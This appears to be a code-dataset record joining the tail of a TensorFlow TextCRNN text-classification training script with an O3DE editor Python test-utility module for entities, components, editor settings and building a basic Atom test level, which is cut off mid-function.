VOCAB_SIZE = dh.load_vocab_size(FLAGS.embedding_dim)
pretrained_word2vec_matrix = dh.load_word2vec_matrix(VOCAB_SIZE, FLAGS.embedding_dim)
# Build a graph and crnn object
with tf.Graph().as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=FLAGS.allow_soft_placement,
log_device_placement=FLAGS.log_device_placement)
session_conf.gpu_options.allow_growth = FLAGS.gpu_options_allow_growth
sess = tf.Session(config=session_conf)
with sess.as_default():
crnn = TextCRNN(
sequence_length=FLAGS.pad_seq_len,
num_classes=FLAGS.num_classes,
vocab_size=VOCAB_SIZE,
lstm_hidden_size=FLAGS.lstm_hidden_size,
fc_hidden_size=FLAGS.fc_hidden_size,
embedding_size=FLAGS.embedding_dim,
embedding_type=FLAGS.embedding_type,
filter_sizes=list(map(int, FLAGS.filter_sizes.split(","))),
num_filters=FLAGS.num_filters,
l2_reg_lambda=FLAGS.l2_reg_lambda,
pretrained_embedding=pretrained_word2vec_matrix)
# Define training procedure
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
learning_rate = tf.train.exponential_decay(learning_rate=FLAGS.learning_rate,
global_step=crnn.global_step, decay_steps=FLAGS.decay_steps,
decay_rate=FLAGS.decay_rate, staircase=True)
optimizer = tf.train.AdamOptimizer(learning_rate)
grads, vars = zip(*optimizer.compute_gradients(crnn.loss))
grads, _ = tf.clip_by_global_norm(grads, clip_norm=FLAGS.norm_ratio)
train_op = optimizer.apply_gradients(zip(grads, vars), global_step=crnn.global_step, name="train_op")
# Keep track of gradient values and sparsity (optional)
grad_summaries = []
for g, v in zip(grads, vars):
if g is not None:
grad_hist_summary = tf.summary.histogram("{0}/grad/hist".format(v.name), g)
sparsity_summary = tf.summary.scalar("{0}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
grad_summaries.append(grad_hist_summary)
grad_summaries.append(sparsity_summary)
grad_summaries_merged = tf.summary.merge(grad_summaries)
# Output directory for models and summaries
if FLAGS.train_or_restore == 'R':
MODEL = input("☛ Please input the checkpoints model you want to restore, "
"it should be like(1490175368): ") # The model you want to restore
while not (MODEL.isdigit() and len(MODEL) == 10):
MODEL = input('✘ The format of your input is illegal, please re-input: ')
logger.info('✔︎ The format of your input is legal, now loading to next step...')
checkpoint_dir = 'runs/' + MODEL + '/checkpoints/'
out_dir = os.path.abspath(os.path.join(os.path.curdir, "runs", MODEL))
logger.info("✔︎ Writing to {0}\n".format(out_dir))
else:
timestamp = str(int(time.time()))
out_dir = os.path.abspath(os.path.join(os.path.curdir, "runs", timestamp))
logger.info("✔︎ Writing to {0}\n".format(out_dir))
# Summaries for loss
loss_summary = tf.summary.scalar("loss", crnn.loss)
# Train summaries
train_summary_op = tf.summary.merge([loss_summary, grad_summaries_merged])
train_summary_dir = os.path.join(out_dir, "summaries", "train")
train_summary_writer = tf.summary.FileWriter(train_summary_dir, sess.graph)
# Validation summaries
validation_summary_op = tf.summary.merge([loss_summary])
validation_summary_dir = os.path.join(out_dir, "summaries", "validation")
validation_summary_writer = tf.summary.FileWriter(validation_summary_dir, sess.graph)
saver = tf.train.Saver(tf.global_variables(), max_to_keep=FLAGS.num_checkpoints)
if FLAGS.train_or_restore == 'R':
# Load crnn model
logger.info("✔ Loading model...")
checkpoint_file = tf.train.latest_checkpoint(checkpoint_dir)
logger.info(checkpoint_file)
# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{0}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
else:
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
# Embedding visualization config
config = projector.ProjectorConfig()
embedding_conf = config.embeddings.add()
embedding_conf.tensor_name = 'embedding'
embedding_conf.metadata_path = FLAGS.metadata_file
projector.visualize_embeddings(train_summary_writer, config)
projector.visualize_embeddings(validation_summary_writer, config)
# Save the embedding visualization
saver.save(sess, os.path.join(out_dir, 'embedding', 'embedding.ckpt'))
current_step = sess.run(crnn.global_step)
def train_step(x_batch, y_batch):
"""A single training step"""
feed_dict = {
crnn.input_x: x_batch,
crnn.input_y: y_batch,
crnn.dropout_keep_prob: FLAGS.dropout_keep_prob,
crnn.is_training: True
}
_, step, summaries, loss = sess.run(
[train_op, crnn.global_step, train_summary_op, crnn.loss], feed_dict)
logger.info("step {0}: loss {1:g}".format(step, loss))
train_summary_writer.add_summary(summaries, step)
def validation_step(x_validation, y_validation, writer=None):
"""Evaluates model on a validation set"""
batches_validation = dh.batch_iter(
list(zip(x_validation, y_validation)), FLAGS.batch_size, 1)
# Predict classes by threshold or topk ('ts': threshold; 'tk': topk)
eval_counter, eval_loss, eval_rec_ts, eval_pre_ts, eval_F_ts = 0, 0.0, 0.0, 0.0, 0.0
eval_rec_tk = [0.0] * FLAGS.top_num
eval_pre_tk = [0.0] * FLAGS.top_num
eval_F_tk = [0.0] * FLAGS.top_num
for batch_validation in batches_validation:
x_batch_validation, y_batch_validation = zip(*batch_validation)
feed_dict = {
crnn.input_x: x_batch_validation,
crnn.input_y: y_batch_validation,
crnn.dropout_keep_prob: 1.0,
crnn.is_training: False
}
step, summaries, scores, cur_loss = sess.run(
[crnn.global_step, validation_summary_op, crnn.scores, crnn.loss], feed_dict)
# Predict by threshold
predicted_labels_threshold, predicted_values_threshold = \
dh.get_label_using_scores_by_threshold(scores=scores, threshold=FLAGS.threshold)
cur_rec_ts, cur_pre_ts, cur_F_ts = 0.0, 0.0, 0.0
for index, predicted_label_threshold in enumerate(predicted_labels_threshold):
rec_inc_ts, pre_inc_ts = dh.cal_metric(predicted_label_threshold, y_batch_validation[index])
cur_rec_ts, cur_pre_ts = cur_rec_ts + rec_inc_ts, cur_pre_ts + pre_inc_ts
cur_rec_ts = cur_rec_ts / len(y_batch_validation)
cur_pre_ts = cur_pre_ts / len(y_batch_validation)
cur_F_ts = dh.cal_F(cur_rec_ts, cur_pre_ts)
eval_rec_ts, eval_pre_ts = eval_rec_ts + cur_rec_ts, eval_pre_ts + cur_pre_ts
# Predict by topK
topK_predicted_labels = []
for top_num in range(FLAGS.top_num):
predicted_labels_topk, predicted_values_topk = \
dh.get_label_using_scores_by_topk(scores=scores, top_num=top_num+1)
topK_predicted_labels.append(predicted_labels_topk)
cur_rec_tk = [0.0] * FLAGS.top_num
cur_pre_tk = [0.0] * FLAGS.top_num
cur_F_tk = [0.0] * FLAGS.top_num
for top_num, predicted_labels_topK in enumerate(topK_predicted_labels):
for index, predicted_label_topK in enumerate(predicted_labels_topK):
rec_inc_tk, pre_inc_tk = dh.cal_metric(predicted_label_topK, y_batch_validation[index])
cur_rec_tk[top_num], cur_pre_tk[top_num] = \
cur_rec_tk[top_num] + rec_inc_tk, cur_pre_tk[top_num] + pre_inc_tk
cur_rec_tk[top_num] = cur_rec_tk[top_num] / len(y_batch_validation)
cur_pre_tk[top_num] = cur_pre_tk[top_num] / len(y_batch_validation)
cur_F_tk[top_num] = dh.cal_F(cur_rec_tk[top_num], cur_pre_tk[top_num])
eval_rec_tk[top_num], eval_pre_tk[top_num] = \
eval_rec_tk[top_num] + cur_rec_tk[top_num], eval_pre_tk[top_num] + cur_pre_tk[top_num]
eval_loss = eval_loss + cur_loss
eval_counter = eval_counter + 1
logger.info("✔︎ validation batch {0}: loss {1:g}".format(eval_counter, cur_loss))
logger.info("︎☛ Predict by threshold: recall {0:g}, precision {1:g}, F {2:g}"
.format(cur_rec_ts, cur_pre_ts, cur_F_ts))
logger.info("︎☛ Predict by topK:")
for top_num in range(FLAGS.top_num):
logger.info("Top{0}: recall {1:g}, precision {2:g}, F {3:g}"
.format(top_num + 1, cur_rec_tk[top_num], cur_pre_tk[top_num], cur_F_tk[top_num]))
if writer:
writer.add_summary(summaries, step)
eval_loss = float(eval_loss / eval_counter)
eval_rec_ts = float(eval_rec_ts / eval_counter)
eval_pre_ts = float(eval_pre_ts / eval_counter)
eval_F_ts = dh.cal_F(eval_rec_ts, eval_pre_ts)
for top_num in range(FLAGS.top_num):
eval_rec_tk[top_num] = float(eval_rec_tk[top_num] / eval_counter)
eval_pre_tk[top_num] = float(eval_pre_tk[top_num] / eval_counter)
eval_F_tk[top_num] = dh.cal_F(eval_rec_tk[top_num], eval_pre_tk[top_num])
return eval_loss, eval_rec_ts, eval_pre_ts, eval_F_ts, eval_rec_tk, eval_pre_tk, eval_F_tk
# Generate batches
batches_train = dh.batch_iter(
list(zip(x_train, y_train)), FLAGS.batch_size, FLAGS.num_epochs)
num_batches_per_epoch = int((len(x_train) - 1) / FLAGS.batch_size) + 1
# Training loop. For each batch...
for batch_train in batches_train:
x_batch_train, y_batch_train = zip(*batch_train)
train_step(x_batch_train, y_batch_train)
current_step = tf.train.global_step(sess, crnn.global_step)
if current_step % FLAGS.evaluate_every == 0:
logger.info("\nEvaluation:")
eval_loss, eval_rec_ts, eval_pre_ts, eval_F_ts, eval_rec_tk, eval_pre_tk, eval_F_tk = \
validation_step(x_validation, y_validation, writer=validation_summary_writer)
logger.info("All Validation set: Loss {0:g}".format(eval_loss))
# Predict by threshold
logger.info("︎☛ Predict by threshold: Recall {0:g}, Precision {1:g}, F {2:g}"
.format(eval_rec_ts, eval_pre_ts, eval_F_ts))
# Predict by topK
logger.info("︎☛ Predict by topK:")
for top_num in range(FLAGS.top_num):
logger.info("Top{0}: Recall {1:g}, Precision {2:g}, F {3:g}"
.format(top_num+1, eval_rec_tk[top_num], eval_pre_tk[top_num], eval_F_tk[top_num]))
if current_step % FLAGS.checkpoint_every == 0:
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
path = saver.save(sess, checkpoint_prefix, global_step=current_step)
logger.info("✔︎ Saved model checkpoint to {0}\n".format(path))
if current_step % num_batches_per_epoch == 0:
current_epoch = current_step // num_batches_per_epoch
logger.info("✔︎ Epoch {0} has finished!".format(current_epoch))
logger.info("✔︎ Done.")
if __name__ == '__main__':
train_crnn()
| 52.654391
| 119
| 0.616237
|
ecac3ada13d33e9f972abda546f10c98cc6ac365
| 32,847
|
py
|
Python
|
Gem/PythonTests/Automated/atom_utils/hydra_editor_utils.py
|
aws-lumberyard-dev/o3de-atomtest
|
d14f88e8649a7de86945906376fcf3e60c81d339
|
[
"Apache-2.0",
"MIT"
] | 2
|
2021-07-18T11:20:41.000Z
|
2022-02-01T20:17:50.000Z
|
Gem/PythonTests/Automated/atom_utils/hydra_editor_utils.py
|
aws-lumberyard-dev/o3de-atomtest
|
d14f88e8649a7de86945906376fcf3e60c81d339
|
[
"Apache-2.0",
"MIT"
] | 5
|
2021-07-14T02:24:07.000Z
|
2021-10-04T21:24:35.000Z
|
Gem/PythonTests/Automated/atom_utils/hydra_editor_utils.py
|
aws-lumberyard-dev/o3de-atomtest
|
d14f88e8649a7de86945906376fcf3e60c81d339
|
[
"Apache-2.0",
"MIT"
] | 7
|
2021-07-06T18:21:14.000Z
|
2021-12-06T09:12:40.000Z
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
import collections.abc
import os
from typing import List
from math import isclose
import azlmbr.bus as bus
import azlmbr.editor as editor
import azlmbr.entity as entity
import azlmbr.legacy.general as general
import azlmbr.math as math
import azlmbr.asset as asset
import azlmbr.camera as camera
import azlmbr.object
from azlmbr.entity import EntityType
from Automated.atom_utils.automated_test_utils import TestHelper as helper
from Automated.atom_utils.screenshot_utils import ScreenshotHelper
def find_entity_by_name(entity_name):
"""
Gets an entity ID from the entity with the given entity_name
:param entity_name: String of entity name to search for
:return entity ID
"""
search_filter = entity.SearchFilter()
search_filter.names = [entity_name]
matching_entity_list = entity.SearchBus(bus.Broadcast, "SearchEntities", search_filter)
if matching_entity_list:
matching_entity = matching_entity_list[0]
if matching_entity.IsValid():
print(f"{entity_name} entity found with ID {matching_entity.ToString()}")
return matching_entity
else:
return matching_entity_list
def get_component_type_id(component_name, entity_type=entity.EntityType().Game):
"""
Gets the component_type_id from a given component name
:param component_name: String of component name to search for
:return component type ID
"""
type_ids_list = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeIdsByEntityType", [component_name], entity_type)
component_type_id = type_ids_list[0]
return component_type_id
def add_level_component(component_name):
"""
Adds the specified component to the Level Inspector
:param component_name: String of component name to search for
:return Component object.
"""
level_component_list = [component_name]
level_component_type_ids_list = editor.EditorComponentAPIBus(
bus.Broadcast, "FindComponentTypeIdsByEntityType", level_component_list, EntityType().Level
)
level_component_outcome = editor.EditorLevelComponentAPIBus(
bus.Broadcast, "AddComponentsOfType", [level_component_type_ids_list[0]]
)
level_component = level_component_outcome.GetValue()[0]
return level_component
def add_component(componentName, entityId, entity_type=entity.EntityType().Game):
"""
Given a component name, finds component TypeId, adds to given entity, and verifies successful add/active state.
:param componentName: String of component name to add.
:param entityId: Entity to add component to.
:return: Component object.
"""
typeIdsList = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeIdsByEntityType", [componentName], entity_type)
typeNamesList = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeNames", typeIdsList)
componentOutcome = editor.EditorComponentAPIBus(bus.Broadcast, "AddComponentsOfType", entityId, typeIdsList)
isActive = editor.EditorComponentAPIBus(bus.Broadcast, "IsComponentEnabled", componentOutcome.GetValue()[0])
hasComponent = editor.EditorComponentAPIBus(bus.Broadcast, "HasComponentOfType", entityId, typeIdsList[0])
if componentOutcome.IsSuccess() and isActive:
print("{} component was added to entity".format(typeNamesList[0]))
elif componentOutcome.IsSuccess() and not isActive:
print("{} component was added to entity, but the component is disabled".format(typeNamesList[0]))
elif not componentOutcome.IsSuccess():
print("Failed to add {} component to entity".format(typeNamesList[0]))
if hasComponent:
print("Entity has a {} component".format(typeNamesList[0]))
return componentOutcome.GetValue()[0]
def remove_component(component_name, entity_id):
"""
Removes the specified component from the specified entity.
:param component_name: String of component name to remove.
:param entity_id: Entity to remove component from.
:return: EntityComponentIdPair if removal was successful, else None.
"""
type_ids_list = [get_component_type_id(component_name)]
outcome = editor.EditorComponentAPIBus(bus.Broadcast, "GetComponentOfType", entity_id, type_ids_list[0])
if outcome.IsSuccess():
component_entity_pair = outcome.GetValue()
editor.EditorComponentAPIBus(bus.Broadcast, "RemoveComponents", [component_entity_pair])
has_component = editor.EditorComponentAPIBus(bus.Broadcast, "HasComponentOfType", entity_id, type_ids_list[0])
if has_component:
print(f"Failed to remove {component_name}")
return None
else:
print(f"{component_name} was successfully removed")
return component_entity_pair
else:
print(f"{component_name} not found on entity")
return None
def get_component_property_value(component, component_propertyPath):
"""
Given a component name and component property path, outputs the property's value.
:param component: Component object to act on.
:param component_propertyPath: String of component property. (e.g. 'Settings|Visible')
:return: Value set in given componentPropertyPath
"""
componentPropertyObj = editor.EditorComponentAPIBus(
bus.Broadcast, "GetComponentProperty", component, component_propertyPath
)
if componentPropertyObj.IsSuccess():
componentProperty = componentPropertyObj.GetValue()
print(f"{component_propertyPath} set to {componentProperty}")
return componentProperty
else:
print(f"FAILURE: Could not get value from {component_propertyPath}")
return None
def get_property_tree(component):
"""
Given a configured component object, prints the property tree info from that component
:param component: Component object to act on.
"""
pteObj = editor.EditorComponentAPIBus(bus.Broadcast, "BuildComponentPropertyTreeEditor", component)
pte = pteObj.GetValue()
print(pte.build_paths_list())
return pte
def compare_values(first_object: object, second_object: object, name: str) -> bool:
# Quick case - can we just directly compare the two objects successfully?
if first_object == second_object:
result = True
# No, so get a lot more specific
elif isinstance(first_object, collections.abc.Container):
# If they aren't both containers, they're different
if not isinstance(second_object, collections.abc.Container):
result = False
# If they have different lengths, they're different
elif len(first_object) != len(second_object):
result = False
# If they're different strings, they're containers but they failed the == check so
# we know they're different
elif isinstance(first_object, str):
result = False
else:
# It's a collection of values, so iterate through them all...
collection_idx = 0
result = True
for val1, val2 in zip(first_object, second_object):
result = result and compare_values(val1, val2, f"{name} (index [{collection_idx}])")
collection_idx = collection_idx + 1
else:
# Do approximate comparisons for floats
if isinstance(first_object, float) and isclose(first_object, second_object, rel_tol=0.001):
result = True
# We currently don't have a generic way to compare PythonProxyObject contents, so return a
# false positive result for now.
elif isinstance(first_object, azlmbr.object.PythonProxyObject):
print(f"{name}: validation inconclusive, the two objects cannot be directly compared.")
result = True
else:
result = False
if not result:
print(
f"compare_values failed: {first_object} ({type(first_object)}) vs {second_object} ({type(second_object)})"
)
print(f"{name}: {'SUCCESS' if result else 'FAILURE'}")
return result
class Entity:
"""
Entity class used to create entity objects
:param name: String for the name of the Entity
:param id: The ID of the entity
"""
def __init__(self, name: str, id: object = entity.EntityId()):
self.name: str = name
self.id: object = id
self.components: List[object] = None
self.parent_id = None
self.parent_name = None
def create_entity(self, entity_position=None, components=[], parent_id=entity.EntityId()):
if entity_position is None:
self.id = editor.ToolsApplicationRequestBus(bus.Broadcast, 'CreateNewEntity', parent_id)
else:
self.id = editor.ToolsApplicationRequestBus(
bus.Broadcast, "CreateNewEntityAtPosition", entity_position, parent_id
)
if self.id.IsValid():
print(f"{self.name} Entity successfully created")
editor.EditorEntityAPIBus(bus.Event, "SetName", self.id, self.name)
self.components = []
for component in components:
self.add_component(component)
def add_component(self, component):
new_component = add_component(component, self.id)
self.components.append(new_component)
def remove_component(self, component):
removed_component = remove_component(component, self.id)
if removed_component is not None:
self.components.remove(removed_component)
def get_parent_info(self):
"""
Sets the value for parent_id and parent_name on the entity (self)
Prints the string for papertrail
:return: None
"""
self.parent_id = editor.EditorEntityInfoRequestBus(bus.Event, "GetParent", self.id)
self.parent_name = editor.EditorEntityInfoRequestBus(bus.Event, "GetName", self.parent_id)
print(f"The parent entity of {self.name} is {self.parent_name}")
def set_test_parent_entity(self, parent_entity_obj):
editor.EditorEntityAPIBus(bus.Event, "SetParent", self.id, parent_entity_obj.id)
self.get_parent_info()
def get_set_test(self, component_index: int, path: str, value: object, expected_result: object = None) -> bool:
"""
Used to set and validate changes in component values
:param component_index: Index location in the self.components list
:param path: asset path in the component
:param value: new value for the variable being changed in the component
:param expected_result: (optional) check the result against a specific expected value
"""
if expected_result is None:
expected_result = value
# Test Get/Set (get old value, set new value, check that new value was set correctly)
print(f"Entity {self.name} Path {path} Component Index {component_index} ")
component = self.components[component_index]
old_value = get_component_property_value(component, path)
if old_value is not None:
print(f"SUCCESS: Retrieved property Value for {self.name}")
else:
print(f"FAILURE: Failed to find value in {self.name} {path}")
return False
if old_value == expected_result:
print(
(
f"WARNING: get_set_test on {self.name} is setting the same value that already exists ({old_value})."
"The set results will be inconclusive."
)
)
editor.EditorComponentAPIBus(bus.Broadcast, "SetComponentProperty", component, path, value)
new_value = get_component_property_value(self.components[component_index], path)
if new_value is not None:
print(f"SUCCESS: Retrieved new property Value for {self.name}")
else:
print(f"FAILURE: Failed to find new value in {self.name}")
return False
return compare_values(new_value, expected_result, f"{self.name} {path}")
def get_set_test(entity: object, component_index: int, path: str, value: object) -> bool:
"""
Used to set and validate changes in component values
:param component_index: Index location in the entity.components list
:param path: asset path in the component
:param value: new value for the variable being changed in the component
"""
return entity.get_set_test(component_index, path, value)
def get_set_property_test(
ly_object: object, attribute_name: str, value: object, expected_result: object = None
) -> bool:
"""
Used to set and validate BehaviorContext property changes in Lumberyard objects
:param ly_object: The lumberyard object to test
:param attribute_name: property (attribute) name in the BehaviorContext
:param value: new value for the variable being changed in the component
:param expected_result: (optional) check the result against a specific expected value other than the one set
"""
if expected_result is None:
expected_result = value
# Test Get/Set (get old value, set new value, check that new value was set correctly)
print(f"Attempting to set {ly_object.typename}.{attribute_name} = {value} (expected result is {expected_result})")
if hasattr(ly_object, attribute_name):
print(f"SUCCESS: Located attribute {attribute_name} for {ly_object.typename}")
else:
print(f"FAILURE: Failed to find attribute {attribute_name} in {ly_object.typename}")
return False
old_value = getattr(ly_object, attribute_name)
if old_value is not None:
print(f"SUCCESS: Retrieved existing value {old_value} for {attribute_name} in {ly_object.typename}")
else:
print(f"FAILURE: Failed to retrieve value for {attribute_name} in {ly_object.typename}")
return False
if old_value == expected_result:
print(
(
f"WARNING: get_set_test on {attribute_name} is setting the same value that already exists ({old_value})."
"The 'set' result for the test will be inconclusive."
)
)
setattr(ly_object, attribute_name, expected_result)
new_value = getattr(ly_object, attribute_name)
if new_value is not None:
print(f"SUCCESS: Retrieved new value {new_value} for {attribute_name} in {ly_object.typename}")
else:
print(f"FAILURE: Failed to retrieve value for {attribute_name} in {ly_object.typename}")
return False
return compare_values(new_value, expected_result, f"{ly_object.typename}.{attribute_name}")
def has_components(entity_id: object, component_list: list) -> bool:
"""
Used to verify if a given entity has all the components of components_list. Returns True if all the
components are present, else False
:param entity_id: entity id of the entity
:param component_list: list of component names to be verified
"""
type_ids_list = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeIdsByEntityType", component_list, entity.EntityType().Game)
for type_id in type_ids_list:
if not editor.EditorComponentAPIBus(bus.Broadcast, "HasComponentOfType", entity_id, type_id):
return False
return True
def is_component_enabled(entity_componentid_pair):
return editor.EditorComponentAPIBus(bus.Broadcast, "IsComponentEnabled", entity_componentid_pair)
def set_visibility_state(entity_id, visibility_state):
editor.EditorEntityAPIBus(bus.Event, "SetVisibilityState", entity_id, visibility_state)
def is_entity_hidden(entity_id):
return editor.EditorEntityInfoRequestBus(bus.Event, "IsHidden", entity_id)
def delete_entity(entity_id):
editor.ToolsApplicationRequestBus(bus.Broadcast, "DeleteEntityById", entity_id)
def get_asset_by_path(path):
return asset.AssetCatalogRequestBus(bus.Broadcast, "GetAssetIdByPath", path, math.Uuid(), False)
def delete_all_existing_entities():
search_filter = azlmbr.entity.SearchFilter()
all_entities = entity.SearchBus(azlmbr.bus.Broadcast, "SearchEntities", search_filter)
editor.ToolsApplicationRequestBus(bus.Broadcast, "DeleteEntities", all_entities)
def disable_component(component):
editor.EditorComponentAPIBus(bus.Broadcast, "DisableComponents", [component])
# Be this camera
def be_this_camera(camera_entity_id):
camera.EditorCameraViewRequestBus(azlmbr.bus.Event, "ToggleCameraAsActiveView", camera_entity_id)
def set_component_property(component, property_path, property_value):
"""
Given a component returned by 'GetComponentOfType', update its property_path value to property_value
:param component: The component to target in the Editor to set a property for
:param property_path: path to the property to set in the component
:param property_value: the value to set the property to in the property_path
:return: None
"""
editor.EditorComponentAPIBus(azlmbr.bus.Broadcast, 'SetComponentProperty', component, property_path, property_value)
class PathNotFoundError(Exception):
def __init__(self, path):
self.path = path
def __str__(self):
return f'Path "{self.path}" not found in Editor Settings'
def get_editor_settings_path_list():
"""
Get the list of Editor Settings paths
"""
paths = editor.EditorSettingsAPIBus(bus.Broadcast, "BuildSettingsList")
return paths
def get_editor_settings_by_path(path):
"""
Get the value of Editor Settings based on the path.
:param path: path to the Editor Settings to get the value
"""
if path not in get_editor_settings_path_list():
raise PathNotFoundError(path)
outcome = editor.EditorSettingsAPIBus(bus.Broadcast, "GetValue", path)
if outcome.isSuccess():
return outcome.GetValue()
raise RuntimeError(f"GetValue for path '{path}' failed")
def set_editor_settings_by_path(path, value, is_bool=False):
"""
Set the value of Editor Settings based on the path.
# NOTE: Some Editor Settings may need an Editor restart to apply.
# Ex: Enabling or disabling New Viewport Interaction Model
:param path: path to the Editor Settings to get the value
:param value: value to be set
:param is_bool: True for Boolean settings (enable/disable), False for other settings
"""
if path not in get_editor_settings_path_list():
raise PathNotFoundError(path)
if is_bool and not isinstance(value, bool):
def ParseBoolValue(value):
if value == "0":
return False
return True
value = ParseBoolValue(value)
outcome = editor.EditorSettingsAPIBus(bus.Broadcast, "SetValue", path, value)
if not outcome.isSuccess():
raise RuntimeError(f"SetValue for path '{path}' failed")
print(f"Value for path '{path}' is set to {value}")
def get_component_type_id_map(component_name_list):
"""
Given a list of component names, returns a map of component name -> component type id
:param component_name_list: The lumberyard object to test
:return: Dictionary of component name -> component type id pairs
"""
# Remove any duplicates so we don't have to query for the same TypeId
component_names = list(set(component_name_list))
type_ids_by_component = {}
type_ids = editor.EditorComponentAPIBus(bus.Broadcast, "FindComponentTypeIdsByEntityType", component_names, entity.EntityType().Game)
for i, typeId in enumerate(type_ids):
type_ids_by_component[component_names[i]] = typeId
return type_ids_by_component
def helper_create_entity_with_mesh(path_to_mesh, offset=azlmbr.math.Vector3(0.0,0.0,0.0), entity_name='NewEntity'):
# Create a new Entity at the root level
myEntityId = editor.ToolsApplicationRequestBus(azlmbr.bus.Broadcast, 'CreateNewEntity', entity.EntityId())
editor.EditorEntityAPIBus(azlmbr.bus.Event, 'SetName', myEntityId, entity_name)
vec3 = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldTranslation", myEntityId)
vec3.x += offset.x
vec3.y += offset.y
vec3.z += offset.z
azlmbr.components.TransformBus(azlmbr.bus.Event, "SetWorldTranslation", myEntityId, vec3)
# Get Component Types for Atom's Mesh
typeIdsList = [ azlmbr.globals.property.EditorMeshComponentTypeId ]
# add a Mesh component to the entity
componentOutcome = editor.EditorComponentAPIBus(
azlmbr.bus.Broadcast, 'AddComponentsOfType', myEntityId, typeIdsList)
# save a reference to the component
components = componentOutcome.GetValue()
component = components[0]
# an example of checking if the component is there or not
hasComponent = editor.EditorComponentAPIBus(azlmbr.bus.Broadcast, 'HasComponentOfType', myEntityId, typeIdsList[0])
meshId = asset.AssetCatalogRequestBus(bus.Broadcast, 'GetAssetIdByPath', path_to_mesh, math.Uuid(), False)
# set mesh asset
mesh_property_path = 'Controller|Configuration|Mesh Asset'
newObj = editor.EditorComponentAPIBus(
azlmbr.bus.Broadcast, 'SetComponentProperty', component, mesh_property_path, meshId)
if(newObj.IsSuccess()):
print('Mesh asset set')
else:
print('Failed to set mesh asset property')
return myEntityId
def initial_viewport_setup(screen_width, screen_height):
"""
Initial viewport setup for a test to keep screenshots consistent.
:param screen_width: integer representing the screen resolution width.
:param screen_height: integer representing the screen resolution height.
:return: None
"""
general.set_viewport_size(screen_width, screen_height)
general.update_viewport()
helper.wait_for_condition(
function=lambda: helper.isclose(a=general.get_viewport_size().x, b=screen_width, rel_tol=0.1)
and helper.isclose(a=general.get_viewport_size().y, b=screen_height, rel_tol=0.1),
timeout_in_seconds=4.0
)
result = helper.isclose(a=general.get_viewport_size().x, b=screen_width, rel_tol=0.1) and helper.isclose(
a=general.get_viewport_size().y, b=screen_height, rel_tol=0.1)
general.log(general.get_viewport_size().x)
general.log(general.get_viewport_size().y)
general.log(general.get_viewport_size().z)
general.log(f"Viewport is set to the expected size: {result}")
general.log("Basic level created")
general.run_console("r_DisplayInfo = 0")
def after_level_load():
"""Function to call after creating/opening a level to ensure it loads."""
# Give everything a second to initialize.
general.idle_enable(True)
general.idle_wait(1.0)
general.update_viewport()
general.idle_wait(0.5) # half a second is more than enough for updating the viewport.
# Close out problematic windows, FPS meters, and anti-aliasing.
if general.is_helpers_shown(): # Turn off the helper gizmos if visible
general.toggle_helpers()
general.idle_wait(1.0)
if general.is_pane_visible("Error Report"): # Close Error Report windows that block focus.
general.close_pane("Error Report")
if general.is_pane_visible("Error Log"): # Close Error Log windows that block focus.
general.close_pane("Error Log")
general.idle_wait(1.0)
general.run_console("r_displayInfo=0")
general.run_console("r_antialiasingmode=0")
general.idle_wait(1.0)
return True
def create_basic_atom_level(level_name):
"""
Creates a new level inside the Editor matching level_name & adds the following:
1. "default_level" entity to hold all other entities.
2. Adds Grid, Global Skylight (IBL), ground Mesh, Directional Light, Sphere w/ material+mesh, & Camera components.
3. Each of these components has its settings tweaked slightly to match the ideal scene to test Atom rendering.
:param level_name: name of the level to create and apply this basic setup to.
:return: None
"""
# Create a new level.
new_level_name = level_name
heightmap_resolution = 512
heightmap_meters_per_pixel = 1
terrain_texture_resolution = 412
use_terrain = False
# Return codes are ECreateLevelResult defined in CryEdit.h
return_code = general.create_level_no_prompt(
new_level_name, heightmap_resolution, heightmap_meters_per_pixel, terrain_texture_resolution, use_terrain)
if return_code == 1:
general.log(f"{new_level_name} level already exists")
elif return_code == 2:
general.log("Failed to create directory")
elif return_code == 3:
general.log("Directory length is too long")
elif return_code != 0:
general.log("Unknown error, failed to create level")
else:
general.log(f"{new_level_name} level created successfully")
# Basic setup for newly created level.
after_level_load()
# Create default_level entity
delete_all_existing_entities()
default_level = Entity("default_level")
position = math.Vector3(0.0, 0.0, 0.0)
default_level.create_entity(position, ["Grid"])
default_level.get_set_test(0, "Controller|Configuration|Secondary Grid Spacing", 1.0)
# Set the viewport up correctly after adding the parent default_level entity.
screen_width = 1280
screen_height = 720
degree_radian_factor = 0.0174533 # Used by "Rotation" property for the Transform component.
initial_viewport_setup(screen_width, screen_height)
# Create global_skylight entity and set the properties
global_skylight = Entity("global_skylight")
global_skylight.create_entity(
entity_position=None,
components=["HDRi Skybox", "Global Skylight (IBL)"],
parent_id=default_level.id)
global_skylight_asset_path = os.path.join(
"LightingPresets", "greenwich_park_02_4k_iblskyboxcm_iblspecular.exr.streamingimage")
global_skylight_asset_value = get_asset_by_path(global_skylight_asset_path)
global_skylight.get_set_test(0, "Controller|Configuration|Cubemap Texture", global_skylight_asset_value)
global_skylight.get_set_test(1, "Controller|Configuration|Diffuse Image", global_skylight_asset_value)
global_skylight.get_set_test(1, "Controller|Configuration|Specular Image", global_skylight_asset_value)
# Create ground_plane entity and set the properties
ground_plane = Entity("ground_plane")
ground_plane.create_entity(
entity_position=None,
components=["Material"],
parent_id=default_level.id)
azlmbr.components.TransformBus(azlmbr.bus.Event, "SetLocalUniformScale", ground_plane.id, 32.0)
ground_plane_material_asset_path = os.path.join(
"Materials", "Presets", "PBR", "metal_chrome.azmaterial")
ground_plane_material_asset_value = get_asset_by_path(ground_plane_material_asset_path)
